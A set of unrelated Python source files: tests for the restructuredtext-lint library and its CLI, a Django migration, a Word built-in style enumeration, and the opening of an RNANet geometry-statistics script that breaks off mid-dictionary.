self.assertEqual(actual_errors[0].level, 2)
self.assertEqual(actual_errors[0].type, 'WARNING')
self.assertEqual(actual_errors[0].source, invalid_rst)
self.assertEqual(actual_errors[0].message, 'Title underline too short.')
def test_encoding_utf8(self):
"""A document with utf-8 characters is valid."""
filepath = os.path.join(_dir, 'test_files', 'utf8.rst')
errors = restructuredtext_lint.lint_file(filepath, encoding='utf-8')
self.assertEqual(errors, [])
def test_second_heading_short_line_number(self):
"""A document with a short second heading raises errors that include a line number
This is a regression test for https://github.com/twolfson/restructuredtext-lint/issues/5
"""
filepath = os.path.join(_dir, 'test_files', 'second_short_heading.rst')
errors = restructuredtext_lint.lint_file(filepath)
self.assertEqual(errors[0].line, 6)
self.assertEqual(errors[0].source, filepath)
def test_invalid_target(self):
"""A document with an invalid target name raises an error
This is a regression test for https://github.com/twolfson/restructuredtext-lint/issues/6
"""
filepath = os.path.join(_dir, 'test_files', 'invalid_target.rst')
errors = restructuredtext_lint.lint_file(filepath)
self.assertIn('Unknown target name', errors[0].message)
def test_invalid_line_mismatch(self):
"""A document with an overline/underline mismatch raises an error
This is a regression test for https://github.com/twolfson/restructuredtext-lint/issues/7
"""
filepath = os.path.join(_dir, 'test_files', 'invalid_line_mismatch.rst')
errors = restructuredtext_lint.lint_file(filepath)
self.assertIn('Title overline & underline mismatch', errors[0].message)
def test_invalid_link(self):
"""A document with a bad link raises an error
This is a regression test for https://github.com/twolfson/restructuredtext-lint/issues/12
"""
filepath = os.path.join(_dir, 'test_files', 'invalid_link.rst')
errors = restructuredtext_lint.lint_file(filepath)
self.assertIn('Anonymous hyperlink mismatch: 1 references but 0 targets.', errors[0].message)
self.assertIn('Hyperlink target "hello" is not referenced.', errors[1].message)
def test_rst_prolog_basic(self):
"""A document using substitutions from an `rst-prolog` has no errors"""
# https://github.com/twolfson/restructuredtext-lint/issues/39
# Set up our common content
rst_prolog = textwrap.dedent("""
.. |World| replace:: Moon
""")
content = textwrap.dedent("""
Hello
=====
|World|
""")
# Verify we have errors about substitutions without our `--rst-prolog`
errors = restructuredtext_lint.lint(content)
self.assertEqual(len(errors), 1)
self.assertIn('Undefined substitution referenced: "World"', errors[0].message)
# Verify we have no errors with our `--rst-prolog`
errors = restructuredtext_lint.lint(content, rst_prolog=rst_prolog)
self.assertEqual(len(errors), 0)
def test_rst_prolog_line_offset(self):
"""A document with errors using an `rst-prolog` offsets our error lines"""
# https://github.com/twolfson/restructuredtext-lint/issues/39
# Perform our setup
rst_prolog = textwrap.dedent("""
.. |World| replace:: Moon
""")
content = textwrap.dedent("""
Hello
==
|World|
""")
# Lint our content and assert its errors
errors = restructuredtext_lint.lint(content, rst_prolog=rst_prolog)
self.assertEqual(len(errors), 1)
self.assertIn('Possible title underline, too short for the title', errors[0].message)
# DEV: Without adjustments, this would be 6 due to empty lines in multiline strings
self.assertEqual(errors[0].line, 3)
class TestRestructuredtextLintCLI(TestCase):
    """ Tests for 'rst-lint' CLI command """
    def test_rst_lint_filepaths_not_given(self):
        """The `rst-lint` command is available and prints error if no filepath was given."""
        with self.assertRaises(subprocess.CalledProcessError) as e:
            # python ../cli.py
            subprocess.check_output((sys.executable, rst_lint_path), stderr=subprocess.STDOUT)
        output = str(e.exception.output)
        # Python 2: "too few arguments"
        # Python 3: "the following arguments are required: filepath"
        self.assertIn('arguments', output)
    def test_rst_lint_correct_file(self):
        """The `rst-lint` command prints nothing if rst file is correct."""
        # python ../cli.py test_files/valid.rst
        raw_output = subprocess.check_output((sys.executable, rst_lint_path, valid_rst), universal_newlines=True)
        output = str(raw_output)
        self.assertEqual(output, '')
    def test_rst_lint_folder(self):
        """The `rst-lint` command should print errors for files inside folders."""
        with self.assertRaises(subprocess.CalledProcessError) as e:
            subprocess.check_output((sys.executable, rst_lint_path, dir_rst), universal_newlines=True)
        output = str(e.exception.output)
        # Verify exactly 1 error is produced
        self.assertEqual(output.count('WARNING'), 1)
    def test_rst_lint_many_files(self):
        """The `rst-lint` command accepts many rst file paths and prints respective information for each of them."""
        with self.assertRaises(subprocess.CalledProcessError) as e:
            # python ../cli.py test_files/valid.rst invalid.rst
            subprocess.check_output((sys.executable, rst_lint_path, valid_rst, invalid_rst), universal_newlines=True)
        output = str(e.exception.output)
        # 'rst-lint' should exit with error code 2 as linting failed:
        self.assertEqual(e.exception.returncode, 2)
        # There should be no clean output:
        # DEV: This verifies only 1 line of output which is our invalid line
        self.assertEqual(output.count('\n'), 1, output)
        # There should be a least one invalid rst file:
        self.assertIn('WARNING', output)
    def test_level_fail(self):
        """Confirm low --level threshold fails file with warnings only"""
        # This is the expected behaviour we are checking:
        # $ rst-lint --level warning second_short_heading.rst ; echo "Return code $?"
        # WARNING second_short_heading.rst:6 Title underline too short.
        # WARNING second_short_heading.rst:6 Title underline too short.
        # Return code 2
        with self.assertRaises(subprocess.CalledProcessError) as e:
            subprocess.check_output((sys.executable, rst_lint_path, '--level', 'warning', warning_rst),
                                    universal_newlines=True)
        output = str(e.exception.output)
        self.assertEqual(output.count('\n'), 2, output)
        self.assertEqual(output.count('WARNING'), 2, output)
        # The expected 2 warnings should be treated as failing
        self.assertEqual(e.exception.returncode, 2)
    def test_level_high(self):
        """Confirm high --level threshold accepts file with warnings only"""
        # This is the expected behaviour we are checking:
        # $ rst-lint --level error second_short_heading.rst ; echo "Return code $?"
        # Return code 0
        raw_output = subprocess.check_output((sys.executable, rst_lint_path, '--level', 'error', warning_rst),
                                             universal_newlines=True)
        # `check_output` doesn't raise an exception code so it's error code 0
        output = str(raw_output)
        self.assertEqual(output, '')
|
# Generated by Django 3.1.7 on 2021-07-28 11:38
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration removing the ``slug`` field from ``post``."""
    dependencies = [
        ('simple', '0004_auto_20210726_1217'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='post',
            name='slug',
        ),
    ]
|
# encoding: utf-8
"""
Enumerations related to styles
"""
from __future__ import absolute_import, print_function, unicode_literals
from docxx.enum.base import alias, EnumMember, XmlEnumeration, XmlMappedEnumMember
@alias('WD_STYLE')
class WD_BUILTIN_STYLE(XmlEnumeration):
    """
    alias: **WD_STYLE**

    Specifies a built-in Microsoft Word style.

    Example::

        from docxx import Document
        from docxx.enum.style import WD_STYLE

        document = Document()
        styles = document.styles
        style = styles[WD_STYLE.BODY_TEXT]
    """
    __ms_name__ = 'WdBuiltinStyle'
    __url__ = 'http://msdn.microsoft.com/en-us/library/office/ff835210.aspx'
    # NOTE(review): the negative integers mirror Word's WdBuiltinStyle
    # constants (see __url__) — confirm against that reference before
    # adding members.
    __members__ = (
        EnumMember(
            'BLOCK_QUOTATION', -85, 'Block Text.'
        ),
        EnumMember(
            'BODY_TEXT', -67, 'Body Text.'
        ),
        EnumMember(
            'BODY_TEXT_2', -81, 'Body Text 2.'
        ),
        EnumMember(
            'BODY_TEXT_3', -82, 'Body Text 3.'
        ),
        EnumMember(
            'BODY_TEXT_FIRST_INDENT', -78, 'Body Text First Indent.'
        ),
        EnumMember(
            'BODY_TEXT_FIRST_INDENT_2', -79, 'Body Text First Indent 2.'
        ),
        EnumMember(
            'BODY_TEXT_INDENT', -68, 'Body Text Indent.'
        ),
        EnumMember(
            'BODY_TEXT_INDENT_2', -83, 'Body Text Indent 2.'
        ),
        EnumMember(
            'BODY_TEXT_INDENT_3', -84, 'Body Text Indent 3.'
        ),
        EnumMember(
            'BOOK_TITLE', -265, 'Book Title.'
        ),
        EnumMember(
            'CAPTION', -35, 'Caption.'
        ),
        EnumMember(
            'CLOSING', -64, 'Closing.'
        ),
        EnumMember(
            'COMMENT_REFERENCE', -40, 'Comment Reference.'
        ),
        EnumMember(
            'COMMENT_TEXT', -31, 'Comment Text.'
        ),
        EnumMember(
            'DATE', -77, 'Date.'
        ),
        EnumMember(
            'DEFAULT_PARAGRAPH_FONT', -66, 'Default Paragraph Font.'
        ),
        EnumMember(
            'EMPHASIS', -89, 'Emphasis.'
        ),
        EnumMember(
            'ENDNOTE_REFERENCE', -43, 'Endnote Reference.'
        ),
        EnumMember(
            'ENDNOTE_TEXT', -44, 'Endnote Text.'
        ),
        EnumMember(
            'ENVELOPE_ADDRESS', -37, 'Envelope Address.'
        ),
        EnumMember(
            'ENVELOPE_RETURN', -38, 'Envelope Return.'
        ),
        EnumMember(
            'FOOTER', -33, 'Footer.'
        ),
        EnumMember(
            'FOOTNOTE_REFERENCE', -39, 'Footnote Reference.'
        ),
        EnumMember(
            'FOOTNOTE_TEXT', -30, 'Footnote Text.'
        ),
        EnumMember(
            'HEADER', -32, 'Header.'
        ),
        EnumMember(
            'HEADING_1', -2, 'Heading 1.'
        ),
        EnumMember(
            'HEADING_2', -3, 'Heading 2.'
        ),
        EnumMember(
            'HEADING_3', -4, 'Heading 3.'
        ),
        EnumMember(
            'HEADING_4', -5, 'Heading 4.'
        ),
        EnumMember(
            'HEADING_5', -6, 'Heading 5.'
        ),
        EnumMember(
            'HEADING_6', -7, 'Heading 6.'
        ),
        EnumMember(
            'HEADING_7', -8, 'Heading 7.'
        ),
        EnumMember(
            'HEADING_8', -9, 'Heading 8.'
        ),
        EnumMember(
            'HEADING_9', -10, 'Heading 9.'
        ),
        EnumMember(
            'HTML_ACRONYM', -96, 'HTML Acronym.'
        ),
        EnumMember(
            'HTML_ADDRESS', -97, 'HTML Address.'
        ),
        EnumMember(
            'HTML_CITE', -98, 'HTML Cite.'
        ),
        EnumMember(
            'HTML_CODE', -99, 'HTML Code.'
        ),
        EnumMember(
            'HTML_DFN', -100, 'HTML Definition.'
        ),
        EnumMember(
            'HTML_KBD', -101, 'HTML Keyboard.'
        ),
        EnumMember(
            'HTML_NORMAL', -95, 'Normal (Web).'
        ),
        EnumMember(
            'HTML_PRE', -102, 'HTML Preformatted.'
        ),
        EnumMember(
            'HTML_SAMP', -103, 'HTML Sample.'
        ),
        EnumMember(
            'HTML_TT', -104, 'HTML Typewriter.'
        ),
        EnumMember(
            'HTML_VAR', -105, 'HTML Variable.'
        ),
        EnumMember(
            'HYPERLINK', -86, 'Hyperlink.'
        ),
        EnumMember(
            'HYPERLINK_FOLLOWED', -87, 'Followed Hyperlink.'
        ),
        EnumMember(
            'INDEX_1', -11, 'Index 1.'
        ),
        EnumMember(
            'INDEX_2', -12, 'Index 2.'
        ),
        EnumMember(
            'INDEX_3', -13, 'Index 3.'
        ),
        EnumMember(
            'INDEX_4', -14, 'Index 4.'
        ),
        EnumMember(
            'INDEX_5', -15, 'Index 5.'
        ),
        EnumMember(
            'INDEX_6', -16, 'Index 6.'
        ),
        EnumMember(
            'INDEX_7', -17, 'Index 7.'
        ),
        EnumMember(
            'INDEX_8', -18, 'Index 8.'
        ),
        EnumMember(
            'INDEX_9', -19, 'Index 9.'
        ),
        EnumMember(
            'INDEX_HEADING', -34, 'Index Heading'
        ),
        EnumMember(
            'INTENSE_EMPHASIS', -262, 'Intense Emphasis.'
        ),
        EnumMember(
            'INTENSE_QUOTE', -182, 'Intense Quote.'
        ),
        EnumMember(
            'INTENSE_REFERENCE', -264, 'Intense Reference.'
        ),
        EnumMember(
            'LINE_NUMBER', -41, 'Line Number.'
        ),
        EnumMember(
            'LIST', -48, 'List.'
        ),
        EnumMember(
            'LIST_2', -51, 'List 2.'
        ),
        EnumMember(
            'LIST_3', -52, 'List 3.'
        ),
        EnumMember(
            'LIST_4', -53, 'List 4.'
        ),
        EnumMember(
            'LIST_5', -54, 'List 5.'
        ),
        EnumMember(
            'LIST_BULLET', -49, 'List Bullet.'
        ),
        EnumMember(
            'LIST_BULLET_2', -55, 'List Bullet 2.'
        ),
        EnumMember(
            'LIST_BULLET_3', -56, 'List Bullet 3.'
        ),
        EnumMember(
            'LIST_BULLET_4', -57, 'List Bullet 4.'
        ),
        EnumMember(
            'LIST_BULLET_5', -58, 'List Bullet 5.'
        ),
        EnumMember(
            'LIST_CONTINUE', -69, 'List Continue.'
        ),
        EnumMember(
            'LIST_CONTINUE_2', -70, 'List Continue 2.'
        ),
        EnumMember(
            'LIST_CONTINUE_3', -71, 'List Continue 3.'
        ),
        EnumMember(
            'LIST_CONTINUE_4', -72, 'List Continue 4.'
        ),
        EnumMember(
            'LIST_CONTINUE_5', -73, 'List Continue 5.'
        ),
        EnumMember(
            'LIST_NUMBER', -50, 'List Number.'
        ),
        EnumMember(
            'LIST_NUMBER_2', -59, 'List Number 2.'
        ),
        EnumMember(
            'LIST_NUMBER_3', -60, 'List Number 3.'
        ),
        EnumMember(
            'LIST_NUMBER_4', -61, 'List Number 4.'
        ),
        EnumMember(
            'LIST_NUMBER_5', -62, 'List Number 5.'
        ),
        EnumMember(
            'LIST_PARAGRAPH', -180, 'List Paragraph.'
        ),
        EnumMember(
            'MACRO_TEXT', -46, 'Macro Text.'
        ),
        EnumMember(
            'MESSAGE_HEADER', -74, 'Message Header.'
        ),
        EnumMember(
            'NAV_PANE', -90, 'Document Map.'
        ),
        EnumMember(
            'NORMAL', -1, 'Normal.'
        ),
        EnumMember(
            'NORMAL_INDENT', -29, 'Normal Indent.'
        ),
        EnumMember(
            'NORMAL_OBJECT', -158, 'Normal (applied to an object).'
        ),
        EnumMember(
            'NORMAL_TABLE', -106, 'Normal (applied within a table).'
        ),
        EnumMember(
            'NOTE_HEADING', -80, 'Note Heading.'
        ),
        EnumMember(
            'PAGE_NUMBER', -42, 'Page Number.'
        ),
        EnumMember(
            'PLAIN_TEXT', -91, 'Plain Text.'
        ),
        EnumMember(
            'QUOTE', -181, 'Quote.'
        ),
        EnumMember(
            'SALUTATION', -76, 'Salutation.'
        ),
        EnumMember(
            'SIGNATURE', -65, 'Signature.'
        ),
        EnumMember(
            'STRONG', -88, 'Strong.'
        ),
        EnumMember(
            'SUBTITLE', -75, 'Subtitle.'
        ),
        EnumMember(
            'SUBTLE_EMPHASIS', -261, 'Subtle Emphasis.'
        ),
        EnumMember(
            'SUBTLE_REFERENCE', -263, 'Subtle Reference.'
        ),
        EnumMember(
            'TABLE_COLORFUL_GRID', -172, 'Colorful Grid.'
        ),
        EnumMember(
            'TABLE_COLORFUL_LIST', -171, 'Colorful List.'
        ),
        EnumMember(
            'TABLE_COLORFUL_SHADING', -170, 'Colorful Shading.'
        ),
        EnumMember(
            'TABLE_DARK_LIST', -169, 'Dark List.'
        ),
        EnumMember(
            'TABLE_LIGHT_GRID', -161, 'Light Grid.'
        ),
        EnumMember(
            'TABLE_LIGHT_GRID_ACCENT_1', -175, 'Light Grid Accent 1.'
        ),
        EnumMember(
            'TABLE_LIGHT_LIST', -160, 'Light List.'
        ),
        EnumMember(
            'TABLE_LIGHT_LIST_ACCENT_1', -174, 'Light List Accent 1.'
        ),
        EnumMember(
            'TABLE_LIGHT_SHADING', -159, 'Light Shading.'
        ),
        EnumMember(
            'TABLE_LIGHT_SHADING_ACCENT_1', -173, 'Light Shading Accent 1.'
        ),
        EnumMember(
            'TABLE_MEDIUM_GRID_1', -166, 'Medium Grid 1.'
        ),
        EnumMember(
            'TABLE_MEDIUM_GRID_2', -167, 'Medium Grid 2.'
        ),
        EnumMember(
            'TABLE_MEDIUM_GRID_3', -168, 'Medium Grid 3.'
        ),
        EnumMember(
            'TABLE_MEDIUM_LIST_1', -164, 'Medium List 1.'
        ),
        EnumMember(
            'TABLE_MEDIUM_LIST_1_ACCENT_1', -178, 'Medium List 1 Accent 1.'
        ),
        EnumMember(
            'TABLE_MEDIUM_LIST_2', -165, 'Medium List 2.'
        ),
        EnumMember(
            'TABLE_MEDIUM_SHADING_1', -162, 'Medium Shading 1.'
        ),
        EnumMember(
            'TABLE_MEDIUM_SHADING_1_ACCENT_1', -176,
            'Medium Shading 1 Accent 1.'
        ),
        EnumMember(
            'TABLE_MEDIUM_SHADING_2', -163, 'Medium Shading 2.'
        ),
        EnumMember(
            'TABLE_MEDIUM_SHADING_2_ACCENT_1', -177,
            'Medium Shading 2 Accent 1.'
        ),
        EnumMember(
            'TABLE_OF_AUTHORITIES', -45, 'Table of Authorities.'
        ),
        EnumMember(
            'TABLE_OF_FIGURES', -36, 'Table of Figures.'
        ),
        EnumMember(
            'TITLE', -63, 'Title.'
        ),
        EnumMember(
            'TOAHEADING', -47, 'TOA Heading.'
        ),
        EnumMember(
            'TOC_1', -20, 'TOC 1.'
        ),
        EnumMember(
            'TOC_2', -21, 'TOC 2.'
        ),
        EnumMember(
            'TOC_3', -22, 'TOC 3.'
        ),
        EnumMember(
            'TOC_4', -23, 'TOC 4.'
        ),
        EnumMember(
            'TOC_5', -24, 'TOC 5.'
        ),
        EnumMember(
            'TOC_6', -25, 'TOC 6.'
        ),
        EnumMember(
            'TOC_7', -26, 'TOC 7.'
        ),
        EnumMember(
            'TOC_8', -27, 'TOC 8.'
        ),
        EnumMember(
            'TOC_9', -28, 'TOC 9.'
        ),
    )
class WD_STYLE_TYPE(XmlEnumeration):
    """
    Specifies one of the four style types: paragraph, character, list, or
    table.

    Example::

        from docxx import Document
        from docxx.enum.style import WD_STYLE_TYPE

        styles = Document().styles
        assert styles[0].type == WD_STYLE_TYPE.PARAGRAPH
    """
    __ms_name__ = 'WdStyleType'
    __url__ = 'http://msdn.microsoft.com/en-us/library/office/ff196870.aspx'
    # Third positional argument is the XML attribute value the type maps to.
    __members__ = (
        XmlMappedEnumMember(
            'CHARACTER', 2, 'character', 'Character style.'
        ),
        XmlMappedEnumMember(
            'LIST', 4, 'numbering', 'List style.'
        ),
        XmlMappedEnumMember(
            'PARAGRAPH', 1, 'paragraph', 'Paragraph style.'
        ),
        XmlMappedEnumMember(
            'TABLE', 3, 'table', 'Table style.'
        ),
    )
|
#!/usr/bin/python3
# RNANet statistics
# Developed by Aglaé Tabot & Louis Becquey, 2021
# This file computes additional geometric measures over the produced dataset,
# and estimates their distribtuions through Gaussian mixture models.
# THIS FILE IS NOT SUPPOSED TO BE RUN DIRECTLY.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy.stats as st
import Bio, glob, json, os, random, sqlite3, warnings
from Bio.PDB.MMCIFParser import MMCIFParser
from Bio.PDB.vectors import Vector, calc_angle, calc_dihedral
from multiprocessing import Pool, Value
from pandas.core.common import SettingWithCopyWarning
from setproctitle import setproctitle
from sklearn.mixture import GaussianMixture
from tqdm import tqdm
from RNAnet import init_with_tqdm, trace_unhandled_exceptions, warn, notify
runDir = os.getcwd()
# This dic stores the number laws to use in the GMM to estimate each parameter's distribution.
# If you do not want to trust this data, you can use the --rescan-nmodes option.
# GMMs will be trained between 1 and 8 modes and the best model will be kept.
modes_data = {
# bonded distances, all-atom, common to all. Some are also used for HiRE-RNA.
"C1'-C2'":3, "C2'-C3'":2, "C2'-O2'":2, "C3'-O3'":2, "C4'-C3'":2, "C4'-O4'":2, "C5'-C4'":2, "O3'-P":3, "O4'-C1'":3, "O5'-C5'":3, "P-O5'":3, "P-OP1":2, "P-OP2":2,
# bonded distances, all-atom, purines
"C4-C5":3, "C4-N9":2, "N3-C4":2, "C2-N3":2, "C2-N2":5, "N1-C2":3, "C6-N1":3, "C6-N6":3, "C6-O6":3, "C5-C6":2, "N7-C5":3, "C8-N7":2, "N9-C8":4, "C1'-N9":2,
# bonded distances, all-atom, pyrimidines
"C4-O4":2, "C4-N4":2, "C2-N1":1, "C2-O2":3, "N3-C2":4, "C4-N3":4, "C5-C4":2, "C6-C5":3, "N1-C6":2, "C1'-N1":2,
# torsions, all atom
"Alpha":3, "Beta":2, "Delta":2, "Epsilon":2, "Gamma":3, "Xhi":3, "Zeta":3,
# Pyle, distances
"C1'-P":3, "C4'-P":3, "P-C1'":3, "P-C4'":3,
# Pyle, angles
"C1'-P°-C1'°":3, "P-C1'-P°":2,
# Pyle, torsions
"Eta":1, "Theta":1, "Eta'":1, "Theta'":1, "Eta''":4, "Theta''":3,
# HiRE-RNA, distances
"C4'-P":3, "C4'-C1'":3, "C1'-B1":3, "B1-B2":2,
# HiRE-RNA, angles
"P-O5'-C5'":2, "O5'-C5'-C4'":1, "C5'-C4'-P":2, "C5'-C4'-C1'":2, "C4'-P-O5'":2, "C4'-C1'-B1":2, "C1'-C4'-P":2, "C1'-B1-B2":2,
# HiRE-RNA, torsions
"P-O5'-C5'-C4'":3, "O5'-C5'-C4'-P°":3, "O5'-C5'-C4'-C1'":3, "C5'-C4'-P°-O5'°":3, "C5'-C4'-C1'-B1":2, "C4'-P°-O5'°-C5'°":3, "C4'-C1'-B1-B2":3, "C1'-C4'-P°-O5'°":3,
# HiRE-RNA, basepairs
"cWW_AA_tips_distance":3, "cWW_AA_C1'-B1-B1pair":1, "cWW_AA_B1-B1pair-C1'pair":1, "cWW_AA_C4'-C1'-B1-B1pair":2, "cWW_AA_B1-B1pair-C1'pair-C4'pair":3, "cWW_AA_alpha_1":2, "cWW_AA_alpha_2":3, "cWW_AA_dB1":3, "cWW_AA_dB2":3,
"tWW_AA_tips_distance":1, "tWW_AA_C1'-B1-B1pair":1, "tWW_AA_B1-B1pair-C1'pair":1, "tWW_AA_C4'-C1'-B1-B1pair":2, "tWW_AA_B1-B1pair-C1'pair-C4'pair":3, "tWW_AA_alpha_1":2, "tWW_AA_alpha_2":1, "tWW_AA_dB1":1, "tWW_AA_dB2":2,
"cWH_AA_tips_distance":3, "cWH_AA_C1'-B1-B1pair":2, "cWH_AA_B1-B1pair-C1'pair":2, "cWH_AA_C4'-C1'-B1-B1pair":2, "cWH_AA_B1-B1pair-C1'pair-C4'pair":2, "cWH_AA_alpha_1":1, "cWH_AA_alpha_2":2, "cWH_AA_dB1":3, "cWH_AA_dB2":2,
"tWH_AA_tips_distance":3, "tWH_AA_C1'-B1-B1pair":1, "tWH_AA_B1-B1pair-C1'pair":3, "tWH_AA_C4'-C1'-B1-B1pair":2, "tWH_AA_B1-B1pair-C1'pair-C4'pair":2, "tWH_AA_alpha_1":1, "tWH_AA_alpha_2":3, "tWH_AA_dB1":2, "tWH_AA_dB2":1,
"cHW_AA_tips_distance":1, "cHW_AA_C1'-B1-B1pair":2, "cHW_AA_B1-B1pair-C1'pair":2, "cHW_AA_C4'-C1'-B1-B1pair":3, "cHW_AA_B1-B1pair-C1'pair-C4'pair":2, "cHW_AA_alpha_1":2, "cHW_AA_alpha_2":2, "cHW_AA_dB1":3, "cHW_AA_dB2":2,
"tHW_AA_tips_distance":4, "tHW_AA_C1'-B1-B1pair":2, "tHW_AA_B1-B1pair-C1'pair":2, "tHW_AA_C4'-C1'-B1-B1pair":2, "tHW_AA_B1-B1pair-C1'pair-C4'pair":2, "tHW_AA_alpha_1":2, "tHW_AA_alpha_2":1, "tHW_AA_dB1":2, "tHW_AA_dB2":1,
"cWS_AA_tips_distance":2, "cWS_AA_C1'-B1-B1pair":2, "cWS_AA_B1-B1pair-C1'pair":2, "cWS_AA_C4'-C1'-B1-B1pair":2, "cWS_AA_B1-B1pair-C1'pair-C4'pair":1, "cWS_AA_alpha_1":2, "cWS_AA_alpha_2":2, "cWS_AA_dB1":2, "cWS_AA_dB2":1,
"tWS_AA_tips_distance":2, "tWS_AA_C1'-B1-B1pair":2, "tWS_AA_B1-B1pair-C1'pair":2, "tWS_AA_C4'-C1'-B1-B1pair":3, "tWS_AA_B1-B1pair-C1'pair-C4'pair":1, "tWS_AA_alpha_1":2, "tWS_AA_alpha_2":2, "tWS_AA_dB1":2, "tWS_AA_dB2":3,
"cSW_AA_tips_distance":3, "cSW_AA_C1'-B1-B1pair":3, "cSW_AA_B1-B1pair-C1'pair":2, "cSW_AA_C4'-C1'-B1-B1pair":1, "cSW_AA_B1-B1pair-C1'pair-C4'pair":2, "cSW_AA_alpha_1":2, "cSW_AA_alpha_2":2, "cSW_AA_dB1":1, "cSW_AA_dB2":1,
"tSW_AA_tips_distance":3, "tSW_AA_C1'-B1-B1pair":3, "tSW_AA_B1-B1pair-C1'pair":3, "tSW_AA_C4'-C1'-B1-B1pair":2, "tSW_AA_B1-B1pair-C1'pair-C4'pair":2, "tSW_AA_alpha_1":2, "tSW_AA_alpha_2":2, "tSW_AA_dB1":2, "tSW_AA_dB2":2,
"cHH_AA_tips_distance":4, "cHH_AA_C1'-B1-B1pair":2, "cHH_AA_B1-B1pair-C1'pair":3, "cHH_AA_C4'-C1'-B1-B1pair":3, "cHH_AA_B1-B1pair-C1'pair-C4'pair":3, "cHH_AA_alpha_1":2, "cHH_AA_alpha_2":3, "cHH_AA_dB1":3, "cHH_AA_dB2":1,
"tHH_AA_tips_distance":2, "tHH_AA_C1'-B1-B1pair":2, "tHH_AA_B1-B1pair-C1'pair":2, "tHH_AA_C4'-C1'-B1-B1pair":3, "tHH_AA_B1-B1pair-C1'pair-C4'pair":1, "tHH_AA_alpha_1":2, "tHH_AA_alpha_2":2, "tHH_AA_dB1":2, "tHH_AA_dB2":2,
"cSH_AA_tips_distance":2, "cSH_AA_C1'-B1-B1pair":2, "cSH_AA_B1-B1pair-C1'pair":1, "cSH_AA_C4'-C1'-B1-B1pair":3, "cSH_AA_B1-B1pair-C1'pair-C4'pair":2, "cSH_AA_alpha_1":2, "cSH_AA_alpha_2":2, "cSH_AA_dB1":4, "cSH_AA_dB2":1,
"tSH_AA_tips_distance":2, "tSH_AA_C1'-B1-B1pair":1, "tSH_AA_B1-B1pair-C1'pair":2, "tSH_AA_C4'-C1'-B1-B1pair":2, "tSH_AA_B1-B1pair-C1'pair-C4'pair":2, "tSH_AA_alpha_1":2, "tSH_AA_alpha_2":3, "tSH_AA_dB1":2, "tSH_AA_dB2":2,
"cHS_AA_tips_distance":3, "cHS_AA_C1'-B1-B1pair":2, "cHS_AA_B1-B1pair-C1'pair":2, "cHS_AA_C4'-C1'-B1-B1pair":2, "cHS_AA_B1-B1pair-C1'pair-C4'pair":1, "cHS_AA_alpha_1":2, "cHS_AA_alpha_2":2, "cHS_AA_dB1":1, "cHS_AA_dB2":4,
"tHS_AA_tips_distance":4, "tHS_AA_C1'-B1-B1pair":2, "tHS_AA_B1-B1pair-C1'pair":2, "tHS_AA_C4'-C1'-B1-B1pair":2, "tHS_AA_B1-B1pair-C1'pair-C4'pair":1, "tHS_AA_alpha_1":2, "tHS_AA_alpha_2":1, "tHS_AA_dB1":2, "tHS_AA_dB2":1,
"cSS_AA_tips_distance":6, "cSS_AA_C1'-B1-B1pair":3, "cSS_AA_B1-B1pair-C1'pair":3, "cSS_AA_C4'-C1'-B1-B1pair":2, "cSS_AA_B1-B1pair-C1'pair-C4'pair":2, "cSS_AA_alpha_1":3, "cSS_AA_alpha_2":3, "cSS_AA_dB1":3, "cSS_AA_dB2":5,
"tSS_AA_tips_distance":5, "tSS_AA_C1'-B1-B1pair":1, "tSS_AA_B1-B1pair-C1'pair":1, "tSS_AA_C4'-C1'-B1-B1pair":2, "tSS_AA_B1-B1pair-C1'pair-C4'pair":1, "tSS_AA_alpha_1":3, "tSS_AA_alpha_2":1, "tSS_AA_dB1":4, "tSS_AA_dB2":2,
"cWW_AC_tips_distance":2, "cWW_AC_C1'-B1-B1pair":1, "cWW_AC_B1-B1pair-C1'pair":2, "cWW_AC_C4'-C1'-B1-B1pair":2, "cWW_AC_B1-B1pair-C1'pair-C4'pair":2, "cWW_AC_alpha_1":1, "cWW_AC_alpha_2":2, "cWW_AC_dB1":3, "cWW_AC_dB2":3,
"tWW_AC_tips_distance":2, "tWW_AC_C1'-B1-B1pair":3, "tWW_AC_B1-B1pair-C1'pair":2, "tWW_AC_C4'-C1'-B1-B1pair":3, "tWW_AC_B1-B1pair-C1'pair-C4'pair":3, "tWW_AC_alpha_1":3, "tWW_AC_alpha_2":2, "tWW_AC_dB1":4, "tWW_AC_dB2":3,
"cWH_AC_tips_distance":5, "cWH_AC_C1'-B1-B1pair":2, "cWH_AC_B1-B1pair-C1'pair":2, "cWH_AC_C4'-C1'-B1-B1pair":1, "cWH_AC_B1-B1pair-C1'pair-C4'pair":2, "cWH_AC_alpha_1":2, "cWH_AC_alpha_2":2, "cWH_AC_dB1":4, "cWH_AC_dB2":4,
"tWH_AC_tips_distance":8, "tWH_AC_C1'-B1-B1pair":1, "tWH_AC_B1-B1pair-C1'pair":2, "tWH_AC_C4'-C1'-B1-B1pair":2, "tWH_AC_B1-B1pair-C1'pair-C4'pair":3, "tWH_AC_alpha_1":2, "tWH_AC_alpha_2":2, "tWH_AC_dB1":3, "tWH_AC_dB2":3,
"cHW_AC_tips_distance":2, "cHW_AC_C1'-B1-B1pair":2, "cHW_AC_B1-B1pair-C1'pair":2, "cHW_AC_C4'-C1'-B1-B1pair":3, "cHW_AC_B1-B1pair-C1'pair-C4'pair":2, "cHW_AC_alpha_1":2, "cHW_AC_alpha_2":3, "cHW_AC_dB1":2, "cHW_AC_dB2":5,
"tHW_AC_tips_distance":3, "tHW_AC_C1'-B1-B1pair":2, "tHW_AC_B1-B1pair-C1'pair":3, "tHW_AC_C4'-C1'-B1-B1pair":3, "tHW_AC_B1-B1pair-C1'pair-C4'pair":2, "tHW_AC_alpha_1":2, "tHW_AC_alpha_2":2, "tHW_AC_dB1":3, "tHW_AC_dB2":3,
"cWS_AC_tips_distance":3, "cWS_AC_C1'-B1-B1pair":2, "cWS_AC_B1-B1pair-C1'pair":1, "cWS_AC_C4'-C1'-B1-B1pair":2, "cWS_AC_B1-B1pair-C1'pair-C4'pair":1, "cWS_AC_alpha_1":2, "cWS_AC_alpha_2":1, "cWS_AC_dB1":1, "cWS_AC_dB2":1,
"tWS_AC_tips_distance":4, "tWS_AC_C1'-B1-B1pair":2, "tWS_AC_B1-B1pair-C1'pair":1, "tWS_AC_C4'-C1'-B1-B1pair":2, "tWS_AC_B1-B1pair-C1'pair-C4'pair":2, "tWS_AC_alpha_1":3, "tWS_AC_alpha_2":1, "tWS_AC_dB1":3, "tWS_AC_dB2":2,
